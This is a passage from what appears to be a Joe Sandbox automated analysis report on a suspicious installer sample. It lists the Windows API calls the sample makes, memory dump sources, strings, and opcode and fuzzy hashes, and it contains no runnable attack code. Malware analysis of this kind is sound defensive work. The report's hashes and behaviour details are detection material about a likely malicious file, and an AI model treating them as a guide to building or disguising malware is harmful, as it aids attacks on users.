                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                    • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                    • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                    • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 004052C5
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                      • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                    • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                    • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                    • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405DFD
                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,0043F000,0040338D,00441000,00441800,00441800,00441800,00441800,00441800,75573420,004035D9), ref: 00405E18
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                    • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                    • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                    Strings
                                                                    • Error launching installer, xrefs: 004058B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                    • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                    • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                    • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                    • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                    • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                    • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                    • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98